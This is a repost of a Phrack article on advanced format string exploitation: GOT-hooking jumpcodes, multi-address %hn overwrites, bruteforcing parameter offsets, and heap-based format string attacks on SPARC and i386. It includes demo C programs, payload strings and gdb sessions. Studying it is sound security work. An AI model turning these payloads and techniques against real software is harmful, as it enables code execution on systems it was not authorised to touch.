cyberheartmi9 · August 22, 2017 23:18
diff --git a/Format String b/Format String
                             ==Phrack Inc.==

                  0x0b, Issue 0x3b, Phile #0x07 of 0x12

 |=-------------=[ Advances in format string exploitation ]=--------------=|
 |=-----------------------------------------------------------------------=|
 |=---------=[ by gera <[email protected]>, riq <[email protected]> ]=---------=|


    1 - Intro

    Part I 
    2 - Bruteforcing format strings

    3 - 32*32 == 32 - Using jumpcodes 
      3.1 - write code in any known address
      3.2 - the code is somewhere else
      3.3 - friendly functions
      3.4 - no weird addresses 

    4 - n times faster
      4.1 - multiple address overwrite
      4.2 - multiple parameters bruteforcing

    Part II
    5 - Exploiting heap based format strings

    6 - the SPARC stack
    
    7 - the trick
      7.1 - example 1
      7.2 - example 2
      7.3 - example 3
      7.4 - example 4

    8 - building the 4-bytes-write-anything-anywhere primitive
      8.1 - example 5

    9 - the i386 stack
      9.1 - example 6
      9.2 - example 7 - the pointer generator

    10 - conclusions
      10.1 - is it dangerous to overwrite the l0 (on the stack frame) ?
      10.2 - is it dangerous to overwrite the ebp (on the stack frame) ?
      10.3 - is this reliable ?

    The End
    11 - more greets and thanks

    12 - References

 --[ 1. Intro

   Is there anything else to say about format strings after all this time?
 probably yes, or at least we are trying... To start with, go get scut's
 excellent paper on format strings [1] and read it.

   This text deals with 2 different subjects. The first is about different
 tiny tricks that may help speeding up bruteforcing when exploiting format
 strings bugs, and the second is about exploting heap based format strings
 bugs.

   So fasten your seatbelts, the trip has just begun.


 --[ Part I - by gera
 --[ 2. Bruteforcing format strings

        "...Bruteforcing is not a very happy term, and doesn't make
        justice for a lot of exploit writers, as most of the time a
        lot of brain power is used to solve the problem in better
        ways than just brute force..."

    My greets to all those artists who inspired this phrase, specially
 ~{MaXX,dvorak,Scrippie}, scut[], lg(zip) and lorian+k.

 --[ 3. 32*32 == 32 - Using jumpcodes 

    Ok, first things first...

    A format string lets you, after dealing with it, write what you want
 where you want... I like to call this a write-anything-anywhere primitive,
 and the trick described here can be used whenever you have a
 write-anything-anywhere primitive, be it a format string, an overflow over
 the "destination pointer of a strcpy()", several free()s in a row, a
 ret2memcpy buffer overflow, etc.

    Scut[1], shock[2], and others[3][4] explain several methods to hook the
 execution flow using a write-anything-anywhere primitive, namely changing
 GOT, changing some function pointer, atexit() handlers, erm... a virtual
 member of a class, etc.  When you do so, you need to know, guess or predict
 2 different addresses: function pointer's address and shellcode's address,
 each has 32 bits, and if you go blindly bruteforcing, you'll need to get 64
 bits... well, this is not true, suppose GOT's address always starts with,
 mmm... 0x0804 and that your code will be in, erm... 0x0805... ok, for linux
 this may even be true, so it's not 64 bits, but 32 total, so it's just
 4,294,967,296 tries...  well, no, because you may be able to provide a
 cushion of 4K nops, so it goes down to 1,048,576 tries, and as GOT must be
 walked on 4 bytes steps, it's just 262,144... heh, all theese numbers are
 just... erm... nonsense.

    Well, sometimes there are other tricks you can do, use a read primitive
 to learn something from the target process, or turn a write primitive into
 a read primitive, or use more nops, or target stack or just hardcode some
 addresses and go happy with it...

    But, there is something else you can do, as you are not limited to
 writing only 4 bytes, you can write more than the address to the shellcode,
 you can also write the shellcode!

 ----[ 3.1. write code in any known address

    Even with a single format string bug you can write not only more than
 4, bytes, but you can also write them to different places in memory, so you
 can choose any known to be writable and executable address, lets say,
 0x8051234 (for some target program running on some linux), write some code
 there, and change the function pointer (GOT, atexit()'s functions, etc) to
 point it:


               GOT[read]:     0x8051234     ; of course using read is just
                                            ; an example

               0x8051234:     shellcode

    What's the difference? Well... shellcode's address is now known, it's
 always 0x8051234, hence you only have to bruteforce function pointer's
 address, cutting down the number of bits to 15 in the worst case.

    Ok, right, you got me... you cannot write a 200 bytes shellcode using
 this technique with a format string (or can you?), maybe you can write a
 30 bytes shellcode, but maybe you only have a few bytes... so, we need a
 really small jumpcode for this to work.

 ----[ 3.2. the code is somewhere else

    I'm pretty sure you'll be able to put the code somewhere in target's
 memory, in stack or in heap, or somewhere else (!?). If this is the case,
 we need our jumpcode to locate the shellcode and jump there, what could
 be really easy, or a little more tricky.

    If the shellcode is somewhere in stack (in the same format string
 perhaps?) and if you can, more or less, know how far from the SP it will be
 when the jumpcode is executed, you can jump relative to the SP with just 8
 or 5 bytes:


              GOT[read]:      0x8051234

              0x8051234:      add $0x200, %esp   ; delta from SP to code
                              jmp *%esp          ; just use esp if you can

              esp+0x200:      nops...            ; just in case delta is
                                                 ; not really constant
                              real shellcode     ; this is not writen using
                                                 ; the format string

    Is the code in heap?, but you don't have the slightest idea where it
 is? Just follow Kato (this version is 18 bytes, Kato's version is a little
 longer, but only made of letters, he didn't use a format string though):

              GOT[read]:      0x8051234

              0x8051234:      cld
                              mov $0x4f54414a,%eax   ; so it doesn find
                              inc %eax               ; itself (tx juliano)
                              mov $0x804fff0, %edi   ; start searching low
                                                     ; in memory
                              repne scasl
                              jcxz .-2               ; keep searching!
                              jmp *$edi              ; upper case letters
                                                     ; are ok opcodes.

              somewhere
                in heap:      'KATO'            ; if you know the alignment
                              'KKATO'           ; one is enough, otherwise
                              'KKATO'           ; make some be found
                              'KKATO'
                              real shellcode
                                
    Is it in stack but you don't know where? (10 bytes)

              GOT[read]:      0x8051234

              0x8051234:      mov $0x4f54414a,%ebx   ; so it doesn find
                              inc %ebx               ; itself (tx juliano)
                              pop %eax
                              cmp %ebx, %eax
                              jnz .-3
                              jmp *$esp

              somewhere
               in stack:      'KATO'            ; you'll know the alignment
                              real shellcode

    Something else? ok, you figure your jumpcode yourself :-) But be
 carefull!  'KATO' may not be a good string, as it's executed and has some
 side effect. :-)
    You may even use a jumpcode which copies from stack to heap if the
 stack is not executable but the heap is.

 ----[ 3.3. friendly functions

    When changing GOT you can choose what function pointer you want to use,
 some functions may be better than others for some targets. For example, if
 you know that after you changed the function pointer, the buffer containing
 the shellcode will be free()ed, you can just do: (2 bytes)

              GOT[free]:      0x8051234          ; using free this time

              0x8051234:      pop %eax           ; discarding real ret addr
                              ret                ; jump to free's argument    
 
    The same may happen with read() if the same buffer with the shellcode
 is reused to read more from the net, or syslog() or a lot of other
 functions...  Sometimes you may need a jumpcode a little more complex if
 you need to skip some bytes at the beggining of the shellcode:
 (7 or 10 bytes)

              GOT[syslog]:    0x8051234          ; using syslog

              0x8051234:      pop %eax           ; discarding real ret addr
                              pop %eax
                              add $0x50, %eax    ; skip some non-code bytes
                              jmp *$eax

    And if nothing else works, but you can distinguish between a crash and
 a hung, you can use a jumpcode with an infinite loop that will make the
 target hung: You bruteforce GOT's address until the server hungs, then you
 know you have the right address for some GOT entry that works, and you can
 start bruteforcing the address for the real shellcode.

              GOT[exit]:      0x8051234

              0x8051234:      jmp .              ; infinite loop

 ----[ 3.4. no weird addresses 

    As I don't like choosing arbitrary addresses, like 0x8051234, what we
 can do is something a little different:

              GOT[free]:      &GOT[free]+4       ; point it to next 4 bytes
                              jumpcode           ; address is &GOT[free]+4

    You don't really know GOT[free]'s address, but on every bruteforcing
 step you are assuming you know it, then, you can make it point 4 bytes
 ahead of it, where you can place the jumpcode, i.e. if you assume your
 GOT[free] is at 0x8049094, your jumpcode will be at 0x8049098, then, you
 have to write the value 0x8049098 to the address 0x8049094 and the
 jumpcode to 0x8049098:

  /* fs1.c                                                   *
   * demo program to show format strings techinques          *
   * specially crafted to feed your brain by [email protected] */

  int main() {
    char buf[1000];

    strcpy(buf,
      "\x94\x90\x04\x08"          // GOT[free]'s address
      "\x96\x90\x04\x08"          // 
      "\x98\x90\x04\x08"          // jumpcode address (2 byte for the demo)
      "%.37004u"                  // complete to 0x9098 (0x9098-3*4)
      "%8$hn"                     // write 0x9098 to 0x8049094
      "%.30572u"                  // complete to 0x10804 (0x10804-0x9098)
      "%9$hn"                     // write 0x0804 to 0x8049096
      "%.47956u"                  // complete to 0x1c358 (0x1c358-0x10804)
      "%10$hn"                    // write 5B C3 (pop - ret) to 0x8049098
          );

    printf(buf);
  }

  gera@vaiolent:~/papers/gera$ make fs1
  cc     fs1.c   -o fs1

  gera@vaiolent:~/papers/gera$ gdb fs1
  
  (gdb) br main
  Breakpoint 1 at 0x8048439

  (gdb) r
  Breakpoint 1, 0x08048439 in main ()

  (gdb) n
  ...0000000000000...

  (gdb) x/x 0x8049094
  0x8049094:    0x08049098

  (gdb) x/2i 0x8049098
  0x8049098:    pop    %eax
  0x8049099:    ret    

    So, if the address of the GOT entry for free() is 0x8049094, the next
 time free() is called in the program our little jumpcode will be called
 instead.

    This last method has another advantage, it can be used not only on
 format strings, where you can make every write to a different address, but
 it can also be used with any write-anything-anywhere primitive, like a
 "destination pointer of strcpy()" overwrite, or a ret2memcpy buffer
 overflow. Or if you are as lucky [or clever] as lorian, you may even do
 it with a single free() bug, as he teached me to do.

 --[ 4. n times faster

 ----[ 4.1. multiple address overwrite

    If you can write more than 4 bytes, you can not only put the shellcode
 or jumpcode where you know it is, you can also change several pointers at
 the same time, speeding up things again.

    Of course this can be done, again, with any write-anything-anywhere
 primitive which let's you write more than just 4 bytes, and, as we are
 going to write the same values to all the pointers, there is a cheap way to
 do it with format strings.

    Suppose we are using the following format string to write 0x12345678 at
 the address 0x08049094:

    "\x94\x90\x04\x08"          // the address to write the first 2 bytes
    "AAAA"                      // space for 2nd %.u
    "\x96\x90\x04\x08"          // the address for the next 2 bytes
    "%08x%08x%08x%08x%08x%08x"  // pop 6 arguments
    "%.22076u"                  // complete to 0x5678 (0x5678-4-4-4-6*8)
    "%hn"                       // write 0x5678 to 0x8049094
    "%.48060u"                  // complete to 0x11234 (0x11234-0x5678)
    "%hn"                       // write 0x1234 to 0x8049096

    As %hn does not add characters to the output string, we can write the
 same value to several locations without having to add more padding. For
 example, to turn this format string into one that writes the value
 0x12345678 to 5 consecutive words starting in 0x8049094 we can use:

    "\x94\x90\x04\x08"          // addresses where to write 0x5678
    "\x98\x90\x04\x08"          // 
    "\x9c\x90\x04\x08"          //
    "\xa0\x90\x04\x08"          //
    "\xa4\x90\x04\x08"          //
    "AAAA"                      // space for 2nd %.u
    "\x96\x90\x04\x08"          // addresses for 0x1234
    "\x9a\x90\x04\x08"          //
    "\x9e\x90\x04\x08"          //
    "\xa2\x90\x04\x08"          //
    "\xa6\x90\x04\x08"          //
    "%08x%08x%08x%08x%08x%08x"  // pop 6 arguments
    "%.22044u"                  // complete to 0x5678: 0x5678-(5+1+5)*4-6*8
    "%hn"                       // write 0x5678 to 0x8049094
    "%hn"                       // write 0x5678 to 0x8049098
    "%hn"                       // write 0x5678 to 0x804909c
    "%hn"                       // write 0x5678 to 0x80490a0
    "%hn"                       // write 0x5678 to 0x80490a4
    "%.48060u"                  // complete to 0x11234 (0x11234-0x5678)
    "%hn"                       // write 0x1234 to 0x8049096
    "%hn"                       // write 0x1234 to 0x804909a
    "%hn"                       // write 0x1234 to 0x804909e
    "%hn"                       // write 0x1234 to 0x80490a2
    "%hn"                       // write 0x1234 to 0x80490a6

    Or the equivalent using direct parameter access.

    "\x94\x90\x04\x08"          // addresses where to write 0x5678
    "\x98\x90\x04\x08"          // 
    "\x9c\x90\x04\x08"          //
    "\xa0\x90\x04\x08"          //
    "\xa4\x90\x04\x08"          //
    "\x96\x90\x04\x08"          // addresses for 0x1234
    "\x9a\x90\x04\x08"          //
    "\x9e\x90\x04\x08"          //
    "\xa2\x90\x04\x08"          //
    "\xa6\x90\x04\x08"          //
    "%.22096u"                  // complete to 0x5678 (0x5678-5*4-5*4)
    "%8$hn"                     // write 0x5678 to 0x8049094
    "%9$hn"                     // write 0x5678 to 0x8049098
    "%10$hn"                    // write 0x5678 to 0x804909c
    "%11$hn"                    // write 0x5678 to 0x80490a0
    "%12$hn"                    // write 0x5678 to 0x80490a4
    "%.48060u"                  // complete to 0x11234 (0x11234-0x5678)
    "%13$hn"                    // write 0x1234 to 0x8049096
    "%14$hn"                    // write 0x1234 to 0x804909a
    "%15$hn"                    // write 0x1234 to 0x804909e
    "%16$hn"                    // write 0x1234 to 0x80490a2
    "%17$hn"                    // write 0x1234 to 0x80490a6

    In this example, the number of "function pointers" to write at the same
 time was set arbitrary to 5, but it could have been another number. The
 real limit depends on the length of the string you can supply, how many
 arguments you need to pop to get to the addresses if you are not using
 direct parameter access, if there is a limit for direct parameters access
 (on Solaris' libraries it's 30, on some Linuxes it's 400, and there may be
 other variations), etc.

    If you are going to combine a jumpcode with multiple address overwrite,
 you need to have in mind that the jumpcode will not be just 4 bytes after
 the function pointer, but some more, depending on how many addresses you'll
 overwrite at once.

 ----[ 4.2. multiple parameter bruteforcing

    Sometimes you don't know how many parameters you have to pop, or how
 many to skip with direct parameter access, and you need to try until you
 hit the right number. Sometimes it's possible to do it in a more
 inteligent way, specially when it's not a blind format string (did I say
 it already? go read scut's paper [1]!). But anyway, there may be cases
 when you don't know how many parameters to skip, and have to find it out
 trying, as in the next pythonish example:

    pops = 8
    worked = 0
    while (not worked):
      fstring  = "\x94\x90\x04\x08"        # GOT[free]'s address
      fstring += "\x96\x90\x04\x08"        # 
      fstring += "\x98\x90\x04\x08"        # jumpcode address
      fstring += "%.37004u"                # complete to 0x9098
      fstring += "%%%d$hn" % pops          # write 0x9098 to 0x8049094
      fstring += "%.30572u"                # complete to 0x10804
      fstring += "%%%d$hn" % (pops+1)      # write 0x0804 to 0x8049096
      fstring += "%.47956u"                # complete to 0x1c358
      fstring += "%%%d$hn" % (pops+2)      # write (pop - ret) to 0x8049098
      worked = try_with(fstring)
      pops += 1

    In this example, the variable 'pops' is incremented while trying to
 hit the right number for direct parameter access. If we repeat the target
 addresses, we can build a format string which lets us increment 'pops'
 faster. For example, repeating each address 5 times we get a faster
 bruteforcing:

    pops = 8
    worked = 0
    while (not worked):
      fstring  = "\x94\x90\x04\x08" * 5    # GOT[free]'s address
      fstring += "\x96\x90\x04\x08" * 5    # repeat eddress 5 times
      fstring += "\x98\x90\x04\x08" * 5    # jumpcode address
      fstring += "%.37004u"                # complete to 0x9098
      fstring += "%%%d$hn" % pops          # write 0x9098 to 0x8049094
      fstring += "%.30572u"                # complete to 0x10804
      fstring += "%%%d$hn" % (pops+6)      # write 0x0804 to 0x8049096
      fstring += "%.47956u"                # complete to 0x1c358
      fstring += "%%%d$hn" % (pops+11)     # write (pop - ret) to 0x8049098
      worked = try_with(fstring)
      pops += 5

    Hitting any of the 5 copies well be ok, the most copies you can put
 the better.
    
    This is a simple idea, just repeat the addresses. If it's confusing,
 grab pen and paper and make some drawings, first draw a stack with the
 format string in it, and some random number of arguments on top of it, and
 then start doing the bruteforcing manually... it'll be fun! I guarantee
 it! :-)
    
    It may look stupid but may help you some day, you never know... and of
 course the same could be done without direct parameter access, but it's a
 little more complicated as you have to recalculate the length for %.u
 format specifiers on every try.

 --[ unnamed and unlisted seccion

    Through this text my only point was: a format string is more than a
 mere 4-bytes-write-anything-anywhere primitive, it's almost a full
 write-anything-anywhre primitive, which gives you more posibilities.

    So far so good, the rest is up to you...


 --[ Part II - by riq
 --[ 5. Exploiting heap based format strings

  Usually the format strings lies on the stack. But there are cases where
 it is stored on the heap, and you CAN'T see it.

  Here I present a way to deal with these format strings in a generic way
 within SPARC (and big-endian machines), and at the end we'll show you how
 to do the same for little-endian machines.

 --[ 6. The SPARC stack

  In the stack you will find stack frames. These stack frames have local 
 variables, registers, pointers to previous stack frames, return addresses,
 etc.

  Since with format strings we can see the stack, we are going to study
 it more carefully.

  The stack frames in SPARC looks more or less like the following:


          frame 0              frame 1               frame 2
         [  l0   ]     +----> [  l0   ]      +----> [  l0   ]
         [  l1   ]     |      [  l1   ]      |      [  l1   ]
            ...        |         ...         |         ...   
         [  l7   ]     |      [  l7   ]      |      [  l7   ]
         [  i0   ]     |      [  i0   ]      |      [  i0   ]
         [  i1   ]     |      [  i1   ]      |      [  i1   ]
            ...        |         ...         |         ...   
         [  i5   ]     |      [  i5   ]      |      [  i5   ]
         [  fp   ] ----+      [  fp   ]  ----+      [  fp   ]
         [  i7   ]            [  i7   ]             [  i7   ]
         [ temp 1]            [ temp 1]
                              [ temp 2]

  And so on...

  The fp register is a pointer to the caller frame pointer. As you may
 guess, 'fp' means frame pointer.  

  The temp_N are local variables that are saved in the stack. The frame 1
 starts where the frame 0's local variables end, and the frame 2 starts,
 where the frame 1's local variables end, and so on.

  All these frames are stored in the stack. So we can see all of these
 stack frames with our format strings.


 --[ 7. the trick

  The trick lies in the fact that every stack frame has a pointer to the
 previous stack frame. Furthermore, the more pointers to the stack we have,
 the better.

  Why ? Because if we have a pointer to our own stack, we can overwrite the
 address that it points to with any value.


 --[ 7.1. example 1

 Suppose that we want to put the value 0x1234 in frame 1's l0. What we will
 try to do is to build a format string, whose length is 0x1234, by the time
 we've reached stack frame 0's fp with a %n.

  Supposing that the first argument that we see is the frame 0's l0
 register, we should have a format string like the following (in python):

  '%8x' * 8 +     # pop the 8 registers 'l'
  '%8x' * 5 +     # pop the first 5 'i' registers
  '%4640d'  +     # modify the length of my string (4640 is 0x1220) and...
  '%n'            # I write where fp is pointing (which is frame 1's l0)


  So, after the format string has been executed, our stack should look like
 this:

          frame 0              frame 1 
         [  l0   ]     +----> [ 0x00001234 ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]            [  i7   ]
         [ temp 1]            [ temp 1]
                              [ temp 2]


 --[ 7.2. example 2

  If we decided on a bigger number, like 0x20001234, we should find 2
 pointers that point to the same address in the stack. It should be
 something like this:

          frame 0              frame 1 
         [  l0   ]     +----> [  l0   ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]     |      [  i7   ]
         [ temp 1] ----+      [ temp 1]
                              [ temp 2]

  [ Note: We are not going to find always 2 pointers that point to the same
 address, though it is not rare. ]

  So, our format string should look like this:

  '%8x' * 8 +     # pop the 8 registers 'l'
  '%8x' * 5 +     # pop the first 5 registers 'i'
  '%4640d'  +     # modify the length of my format string (4640 is 0x1220)
  '%n'            # I write where fp is pointing (which is frame 1's l0)
  '%3530d'  +     # again, I modify the length of the format string
  '%hn'           # and I write again, but only the hi part this time!

  And we would get the following:
          frame 0              frame 1 
         [  l0   ]     +----> [ 0x20001234 ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]     |      [  i7   ]
         [ temp 1] ----+      [ temp 1]
                              [ temp 2]


 --[ 7.3. example 3

  In the case that we only have 1 pointer, we can get the same result by
 using the 'direct parameter access' in the format string, with
 %argument_number$, where 'argument_number' is a number between 0 and 30
 (in Solaris).

  My format string should be the following:
    '%4640d' +  # change the length
    '%15$n'  +  # I write where argument 15 is pointing (arg 15 is fp!)
    '%3530d' +  # change the length again
    '%15$hn'    # write again, but only the hi part!

  Therefore, we would arrive at the same result:

          frame 0              frame 1 
         [  l0   ]     +----> [ 0x20001234 ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]            [  i7   ]
         [ temp 1]            [ temp 1]
                              [ temp 2]

 --[ 7.4. example 4

  But it could well happen that I don't have 2 pointers that point to the
 same address in the stack, and the first address that points to the stack
 is outside the scope of the first 30 arguments. What could I then do ?

  Remember that with plain '%n', you can write very large numbers, like
 0x00028000 and higher. You should also keep in mind that the binary's PLT
 is usually located in very low addresses, like 0x0002????. So, with just
 one pointer that points to the stack, you can get a pointer that points to
 the binary's PLT.

  I don't believe a graphic is necessary in this example.


 --[ 8. builind the 4-bytes-write-anything-anywhere primitive

 --[ 8.1. example 5

  In order to get a 4-bytes-write-anything-anywhere primitive we should
 repeat what was done with the stack frame 0, and do it again for another
 stack frame, like frame 1. Our result should look something like the
 following:

      frame 0              frame 1               frame 2
     [  l0   ]     +----> [0x00029e8c]   +----> [0x00029e8e]
     [  l1   ]     |      [  l1   ]      |      [  l1   ]
        ...        |         ...         |         ...   
     [  l7   ]     |      [  l7   ]      |      [  l7   ]
     [  i0   ]     |      [  i0   ]      |      [  i0   ]
     [  i1   ]     |      [  i1   ]      |      [  i1   ]
        ...        |         ...         |         ...   
     [  i5   ]     |      [  i5   ]      |      [  i5   ]
     [  fp   ] ----+      [  fp   ]  ----+      [  fp   ]
     [  i7   ]            [  i7   ]      |      [  i7   ]
     [ temp 1]            [ temp 1]      |
                          [ temp 2]  ----+
                          [ temp 3]

  [Note: As long as the code we want to change is located in 0x00029e8c ]

  So, now that we have 2 pointers, one that points to 0x00029e8c and
 another that points to 0x00029e8e, we have finally achieved our goal! Now,
 we can exploit this situation just like any other format string
 vulnerability :)

  The format string will look like this:

    '%4640d' +  # change the length
    '%15$n'  +  # with 'direct parameter access' I write the lower part
                # of frame 1's l0
    '%3530d' +  # change the length again
    '%15$hn' +  # overwrite the higher part
    '%9876d' +  # change the length
    '%18$hn' +  # And write like any format string exploit!


    '%8x' * 13+ # pop 13 arguments (from argument 15)
    '%6789d' +  # change length
    '%n'     +  # write lower part
    '%8x'    +  # pop
    '%1122d' +  # modify length
    '%hn'    +  # write higher part
    '%2211d' +  # modify length
    '%hn'       # And write, again, like any format string exploit.


  As you can see, this was done with just one format string. But this is
 not always possible. If we can't build 2 pointers, what we need to do, is
 to abuse the format string twice.

  First, we build a pointer that points to 0x00029e8c. Then, we overwrite
 the value that 0x00029e8c points to with '%hn'.
 
  The second time in which we abuse of the format string, we do the same as
 we did before, but with a pointer to 0x00029e8e. There is no real need for
 two pointers (0x00029e8c and 0x00029e8e), as writing first the lower part
 with %n and then the higher part with %hn will work, but you'll have to use
 the same pointer twice, only possible with direct parameter access.

 --[ 9. the i386 stack 

  We can also, exploit a heap based format strings in the i386 arquitecture
 using a very similar technique. Lets see how the i386 stack works.

        frame 0        frame 1        frame 2        frame 3
       [  ebp  ] ---> [  ebp  ] ---> [  ebp  ] ---> [  ebp  ]
       [       ]      [       ]      [       ]      [       ]
       [       ]      [       ]      [       ]      [       ]
       [ ...   ]      [ ...   ]      [ ...   ]      [ ...   ]

  As you can see, i386's stack is very similar to SPARC's, the main
 difference is that all the addresses are stored in little-endian format.

         frame0           frame1
        [ LSB | MSB ] ---> [ LSB | MSB ] 
        [           ]      [           ] 

  So, the trick we were using in SPARC of overwriting address's LSB
 with '%n', and then overwriting its MSB with '%hn' with just one pointer
 won't work in this architecture.

  We need an additional pointer, pointing to MSB's address, in order to
 change it. Something like this:

                    +----------------------------+
                    |                            |
                    |                            V
       [LSB | MSB]  |   [LSB | MSB] ---> [LSB | MSB]
       [         ]  |   [         ]      [         ]
       [         ] -+   [         ]      [         ]
       [  ...    ]      [   ...   ]      [   ...   ]
         Frame B          Frame C          Frame D

  Heh! as you probably guessed, this is not very common on everyday stacks,
 so, what we are going to do, is build the pointers we need, and then, of
 course, use them.

  Warning! We just found out that this technique does not work on latest
 Linuxes, we are not even sure if works on any (it depends on libc/glibc
 version), but we know it works, at least, on OpenBSD, FreeBSD and Solaris
 x86). 

 --[ 9.1. example 6

  This trick will need an aditional frame... latter we'll try to get rid
 of as many frames as possible.
  
                                 +----------------------------+
                                 |                            |
                                 |                            V
   [LSB | MSB] ---> [LSB | MSB] -+   [LSB | MSB] ---> [LSB | MSB]
   [         ]      [         ]      [         ]      [         ]
   [         ]      [         ]      [         ]      [         ]
   [  ...    ]      [  ...    ]      [   ...   ]      [   ...   ]
     Frame A          Frame B          Frame C          Frame D

  Frame A has a pointer to Frame B. Specifically, it's pointing to Frame
 B's ebp. So we can modify the LSB of Frame B's ebp, with an '%hn'. And that
 is what we wanted!. Now Frame B is not pointing to Frame C, but to the MSB
 of Frame D's ebp.

  We are abusing the fact that ebp is already pointing to the stack, and we
 assume that changing its 2 LSB will be enough to make it point to another
 frame's saved ebp. There may be some problems with this (if Frame D is
 not on the same 64k "segment" of Frame C), but we'll get rid of this
 problem in the following examples.

  So with 4 stack frames, we could build one pointer in the stack, and with
 that pointer we could write 2 bytes anywhere in memory. If we have 8 stack
 frames we could repeat the process and build 2 pointers in the stack,
 allowing us to write 4 bytes anywhere in memory.

 --[ 9.2. example 7 - the pointer generator

  There are cases where you don't have 8 (or 4) stack frames. What can we
 do then? Well, using direct parameter access, we could use just 3 stack
 frames to do everything, and not only a 4-bytes-write-anything-anywhere
 primitive but almost a full write-anything-anywhere primitive.

 Lets see how we can do it, heavily abusing direct parameter access,
 our target? to build the address 0xdfbfddf0 in the stack, so we can use it
 latter with another %hn to write there.

 step 1:

  Frame B's saved frame pointer (saved ebp) is already pointing to Frame
 C's saved ebp, so, the first thing we are going to do is change Frame's C
 LSB:

         [ LSB | MSB ] ---> [ LSB | MSB ] ---> [ LSB | MSB ]
         [           ]      [           ]      [           ]
         [           ]      [           ]      [           ]
         [   ...     ]      [    ...    ]      [    ...    ]
            Frame A            Frame B            Frame C
  
  Since we know where in the stack is Frame B, we could use direct
 parameter access to access parameters out of order... and probably not
 just once. Latter we'll see how to find the direct parameter access number
 we need, right now lets just assume Frame B's is 14.

                 # step 1
    '%.56816u' + # change the length (we want to write 0xddf0)
    '%14$hn'   + # Write where argument 14 is pointing
                 # (arg 14 is Frame B's ebp)

  What we get is a modified Frame C's ebp.

 step 2:
         [ LSB | MSB ] ---> [ LSB | MSB ] ---> [ ddf0| MSB ]
         [           ]      [           ]      [           ]
         [           ]      [           ]      [           ]
         [   ...     ]      [    ...    ]      [    ...    ]
            Frame A            Frame B            Frame C

  As Frame A's ebp is already pointing to Frame B's ebp, we can use it to
 change the LSB of Frame B's ebp, and as it is already pointing to Frame C's
 ebp's LSB we can make it point to Frame C's ebp's MSB, we won't have the
 64k segments problem this time, as Frame C's ebp's LSB must be in the same
 segment as its MSB, as it's always 4 bytes aligned... I know it's
 confusing...
  For example if Frame C is at 0xdfbfdd6c, we will want to make Frame B's
 ebp to point to 0xdfbfdd6e, so we can write target address' MSB.

                # step 2
    '%.65406u'+ # we want to write 0xdd6e (65406 = 0x1dd6e-0xddf0)
    '%6$hn'   + # Write where argument 6 is pointing
                # (assuming arg 6 is Frame A's ebp)

 step 3:
                                            +----------+
                                            |          V
         [ LSB | MSB ] ---> [ dd6e| MSB ] --+  [ ddf0| MSB ]
         [           ]      [           ]      [           ]
         [           ]      [           ]      [           ]
         [   ...     ]      [    ...    ]      [    ...    ]
            Frame A            Frame B            Frame C


  The new Frame B points to the MSB of the Frame C's ebp. And now, with 
 another direct parameter access, we build the MSB of the address that we
 were looking for.

                # step 3
    '%.593u'  + # we want to write 0xdfbf (593 = 0xdfbf - 0xdd6e)
    '%14$n'   + # Write where argument 14 is pointing
                # (arg 14 is Frame B's ebp)


 our result:
                                            +----------+
                                            |          V
         [ LSB | MSB ] ---> [ dd6e| MSB ] --+  [ ddf0| dfbf]
         [           ]      [           ]      [           ]
         [           ]      [           ]      [           ]
         [   ...     ]      [    ...    ]      [    ...    ]
            Frame A            Frame B            Frame C


  As you can see, we have our pointer in Frame C's ebp, now we could use it
 to write 2 bytes anywhere in memory. This won't be enough normally to make
 an exploit, but we could use the same trick, USING THESE 3 STACK FRAMES
 AGAIN, to build another pointer (and another, and another...)
 Hey, we've found a pointer generator :-) with only 3 stack frames.

  Got the theory? let's put all this together in an example.

  The following code will use 3 frames (A,B,C) and multiple parameters
 access to write the value 0xaabbccdd to the address 0xdfbfddf0. It was
 tested on an OpenBSD 3.0, and can be tried on other systems.  We'll show
 you here how to tune it to your box.

  /* fs2.c                                                   *
   * demo program to show format strings techinques          *
   * specially crafted to feed your brain by [email protected] */

  do_printf(char *msg) {
    printf(msg);
  }
  
  #define FrameC 0xdfbfdd6c
  #define counter(x)      ((a=(x)-b),(a+=(a<0?0x10000:0)),(b=(x)),a) 
  
  char *write_two_bytes(
      unsigned long where, 
      unsigned short what, 
      int restoreFrameB)
  {
    static char buf[1000]={0};    // enough? sure! :)
    static int a,b=0;
  
    if (restoreFrameB)
      sprintf(buf, "%s%%.%du%%6$hn" , buf, counter((FrameC & 0xffff)));
    sprintf(buf, "%s%%.%du%%14$hn", buf, counter(where & 0xffff));
    sprintf(buf, "%s%%.%du%%6$hn" , buf, counter((FrameC & 0xffff) + 2));
    sprintf(buf, "%s%%.%du%%14$hn", buf, counter(where >> 0x10));
    sprintf(buf, "%s%%.%du%%29$hn", buf, counter(what));
    return buf;
  }
  
  int main() {
    char *buf;
    buf = write_two_bytes(0xdfbfddf0,0xccdd,0);
    buf = write_two_bytes(0xdfbfddf2,0xaabb,1);
    do_printf(buf);
  }

  The values you'll need to change are:

    %6$         number of parameter for Frame A's ebp
    %14$        number of parameter for Frame B's ebp
    %29$        number of parameter for Frame C's ebp
    0xdfbfdd6c  address of Frame C's ebp

  To get the right values:

 gera@vaiolent> cc -o fs fs.c
 gera@vaiolent> gdb fs
 (gdb) br do_printf
 (gdb) r
 (gdb) disp/i $pc
 (gdb) ni
 (gdb) p "run until you get to the first call in do_printf"
 (gdb) ni
 1: x/i $eip  0x17a4 <do_printf+12>:     call   0x208c <_DYNAMIC+140>
 (gdb) bt
 #0  0x17a4 in do_printf ()
 #1  0x1968 in main ()
 (gdb) x/40x $sp
 0xdfbfdcf8:     0x000020d4      0xdfbfdd70      0xdfbfdd00      0x0000195f
